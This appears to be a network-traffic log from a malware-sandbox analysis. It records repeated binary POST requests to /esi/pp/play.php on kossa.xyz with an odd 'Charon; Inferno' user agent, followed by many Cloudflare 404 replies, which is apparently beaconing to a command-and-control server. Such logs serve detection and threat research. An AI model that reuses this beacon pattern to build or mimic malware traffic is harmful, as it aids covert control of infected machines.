Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close
Source: global traffic	HTTP traffic detected: POST /esi/pp/play.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: kossa.xyzAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 690A3530Content-Length: 163Connection: close

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2%2F3%2FYGTqLRrwVxRYD5V6o8dLFQPAl70RKKELnXHzwiFsIH2XD55%2F8HTU0BtJrL1Zc0%2BqzyVQYKfoLsSi1rv5TON5EVTpte0zWNjM9a5ORZnqM1owuJ8kheCb5R4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6729ff697711-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vInpdW2j2t0TkXgNWrVbBrhz59C5ZUZepr6EXNkEDlN5Mmpr3I3XN9MXchA%2FuUuBCNvin54PKkEVjvkFMD1mUTaTWJDjljOyWMNNY2gG90YnT13wAFVp5IWO%2BbU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6734694506b6-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:37 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7V5Gc3atXU%2F7rltrm12KGvbycRYFCgLiJibtU08Is1x6vGrWm%2FIN9lvKLV2xmFkSfDE5rh4%2Fv1K4HHvGipuCkiTMbAUFNj04N3yK7qCmAv2YMqNtVqxcv%2Fzmb0Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe673df81e8895-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RqbB9AlMckjRfLEXC38HUt8viJ2CR%2FdVWCxsO%2BoHbSN0xpni4oUpMZeSqUIbFeVVkL%2Bs3vYMe6TfFwzCv3eFt4urQt%2BRsoBtSMZHf4OabSRk9sogB2WT1NRzmJw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67468dd5066a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:40 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=On2%2FpBbJ8An%2FGT14pb6QnHaMiacGEvLWqvhnE5%2FSD4rLjnj6Rg8CaXBDk5x6PgGIs1zw%2F9xQzIw34H4JV5ysx6pavr9OaSBZznt7OiXOPZ7yuub0vKY0I4ucXdc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe674f5bcf9113-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A5YyEf0yuwnHwY6Ol0zSUHeAlII5yG%2BtbGShw%2FjBJg5diEWvZQfKwCUTDIJxxICscixc6esDrhJtzgAn7OPqg90dV5gKlSdKD%2FW1lVNU2OPU2c2jZDcVkVCMggc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe675ebf0c073a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vEgpr3LOSViFW7U4tH4ppo5INxAD%2BZ%2BN3%2B9UVagKYbUpMETFO48oULBbA5Kr9X056uTqcm%2FIwqhHqd4PEs2vhrZ3QbZ0ozxdU95eKTCIQP9hp9TaTmBW0Aq1vrM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe676afa967686-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=F4Nqrt%2F5hGOyJxDUSwRw%2BU5zDViLSlLSg6wN6Ng%2FzguYQrkaT0UJAvGfoYFQZVGyEo1S7j15L1Is6rYnPqlyrbhlgioaEvmmmIssIyRqN3JfPx8ufigGYDLb8aE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe677e2a1e71e6-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5xx1f%2BZB0Bg5SOjVIWnyu0GmHyG%2FMUBT0%2BClXCf6KEUUmDyR9H%2B5JAFdWPy4E49JxTYPuBPHW9AXlJtc1VrtPim5jOrGLb2ysNW1ZTe9KdOAJZLg%2FJq0FsNYDNM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe678f6e537519-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:52 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l8gl5ethGM613nbIJMkijjldEfcAImSZ1NC%2BMhhEPi8o59DvPMewQifZG5OunxAQsmWlHRTeAIKHni0o%2BThHW2lo09mMKEmROFUNb7SzQ9dbI6%2B8whjK%2B5OwLtQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe679cbdb876d2-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0akr324rj22v7XL1BzRlbcaOgwhIsL47D88GVXY%2FxOflrdVv9CvEO4yeF8f9FJu3D%2B6Y7sLCT%2BeCECm2KJKeJ%2B7ErMUaz8ZvLbAsEZPVjHkh3byzhQxA4ywMTYk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67ac08e59b4c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:56 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2ByevUGMGsZ111zCdJS74X4XYDvx6eVZ3i%2F5VUEP17FJNs3Bqe8Qn0vElJjRGqHAY7uRrku1Pn%2FjCwHkZuCcO%2F57fHu0HPl8zmRUlYlJb33Oa25zNF9kqh6%2FNuew%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67b658a89b8c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kwfBO1rarCMHF33sDfc%2FZKo%2FIgtM77dHh4KfHrltf1yF4wOBGBcPdtPYk7Gne4ienNeRTkl01aZxPHrTI9mJKW6071l4b0ziZbDzmI6omQQuIRxDJR5b361HK7g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67c009327562-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:54:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xqhVjfx2p8PTpn4tczArStndPzakgSs%2BTWI7UJE786K6XBIJeBhOXQHsjNJk26JEngnxLLixd5ZrVVrb8Tu6D0EaWH0pbbBSZ1yLO8LXPRRQZoxw97K2w%2F9d7so%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67c96fb24057-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5Tz5JLO2MblLMyr4APXVpxgxfK%2B0Kc3BOQhOBhwPUsguvgSrEuQlc5mh%2B9pPj8KhG7kVF7cHtszSFE%2BtD9Yahsoh%2BPGlGVRZRdCImmWU%2FfiCDnsGX2p9GMZTsY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67d2489376ef-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:02 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=31Nszk1CWYSA9SOTTjk0axXRKvLvR16xBtz06oEJk7GyK9ZiBFLDPgs20nYRt%2BvKchXumr41xrIC6OwbUn7QZAfWFpu5HQjcSbXgMxSyKeSe0hICexexAPmqGmg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67dc3ac9892a-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:04 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jD6t2rHYuFn4FYzzNqjS8CselpLY%2Bjq1MHBr90Vx4i7IUWEUXUU3OlA90SCJ8Kl8IXVW3L9Jqh0BJ08Xwi2NYeqrBfylpgnGn0wKRBrj36qHUAfUmIVPg7XMvA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67e618697755-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q9GKeM1DCUCNDkWTJI7si91%2FhYmrJiPTzKgnLGatICAm8LrANgt7XyJMgX0Jd8iievc76jPbBHYpgRq%2Fls3LOEKozRxm5HYpLHZPqlwA7h7XdYOvcniRwnEiPWQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe67fb786b8880-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bXMiJPIEoEUFdZzsgRFS8od9XNPKBPK1z7aPFcyn%2FA1ugjwdbtZzB%2BjRKLn%2BXSyWHJukQDQmqihBZ2YI7wjIzshUJaoxfhPtVMIDNZZcS9rYM1PWfoAX6UFsbg0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe680598247780-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FWEWYXk0vBaU2bjp48BtaQpQ3Ggqrm2QHzlEz3cjpBMCny1jbHhv9KIfMDvY7rdMAVGfKU%2FL6ctWgUmBIcCFV68Sb9CTOymCfgRyTXasPXTE76iKGKqAv5qCMAU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68101b8b9be8-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w3W%2FUBL%2FSDBMtNUJBmJhMrWUvmbl3m9w2mVNi%2BJDP21FEOSP848VAvgSKP36DL2w0TklzdIt%2FWhOKAlXmqx%2BuscdBRUNfp46FBktKwDFwm5qu0ArkTMXp%2BiHWGo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe6818698a9001-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JYmA19OcduyPB68nR4yg5R2zInSuuGr81RqiNbiBmJyM8NTQIqVdnKCsXggdgPI9IJQ639Skfc1Xaxz4PkdOsUR9ZWjgTE7x5SeIRsETBiIqx0Y7KYLktWZztss%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe682109b99a3c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Az5zVGZFTjp8UJIVsr25mnNQuPqx6sYujAOPXu5NlvVO05gm%2BOdCbHP1CNU6V0PIsMANXwlKU0iprTk9ImJaLHLGsgKLWrRNBCaiu%2FM8KhdYAvY4x7eWQ0JaV%2Bw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe682b5b2290a0-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9DCxtCUH7NJO56%2Bji8yNiiCJJUgJDBZTOFQ74frU1ObyxO%2F4yOA9ipX6bhRPjdAqvI9ZQ1w6oh0Rh4V58WBQaQEbC8XSU5zs1FYK9hVxC%2FFCS8PYXg4YoUngegM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68345ad99bfe-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tvfj2PE6%2FzpvjRTad2HQGf3EmXoAygqppJ4GMoSzXIKEC9Kqx9btv3UYlJEN3dn3qCQiIHQCkSAYOzM%2B5iLgjP69WWrpi3AVPe3xJD6VNGtajlHFHll17GGpOvI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe684359949122-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKcjv7S0QT5ZJpVTvL7w3xtBMIYOOqiKId0%2BZb%2BJWAkvE4DfQZms%2FQbhb%2BqwW9ZSf5qscvDJiVACPx0SUAt0P2GDUabDptN6K7exXQzxYmUvFD3oHPdEpm7F%2Bi0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe684f9a0a694b-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3PTxemW0dpmMPKHg6J4ZsV3RIVrE%2B1D6NlYV6EaBb0CcFK4SCwX0W%2BcytmanNrEq5gg7yjHWmhtqCOwdXena8YdQgcE7Ahjm15Asa3sXW%2FHrISTw9iwetiveUDk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68589bba9299-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WMMV0Dl8Wspxba7npT6232CcTfyb%2FKLdRqvKQ8FX2nkMR5DilrH%2FC9o%2BbS5hpPrY7BBkeQjY1WEnkPkTLaZt1oLl3lpNanQlhMp%2BfYG6o%2BPcNqu%2FhHuBz84ConA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68719a0e063d-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jUz%2FxTt4iIhJ2PwKINyhFTvj3fDL%2FtQxy7yK4hOYTJZEgvXmXcUwybmZuRWoCmr%2B%2BSCOYt2yJKsyQ%2B5n%2FzDvLj8qUPA%2BLCjB48JsEsZUy8ZrHzGAOf%2BjC3ptrQY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe689eb8ed74c1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 Jun 2022 15:55:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6bbUVXooaIDaeng5rUL%2BPRXKVBsU3sIVHHZmUwvwtYqyrsEzj1XGev9%2F22vst8zBf4AuCJEevAIPszi07TW8pFOJDFqbk%2F4sPNcdIxI38tFcEI4pJhXdDFVe2x0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 71fe68b1dce19bd7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
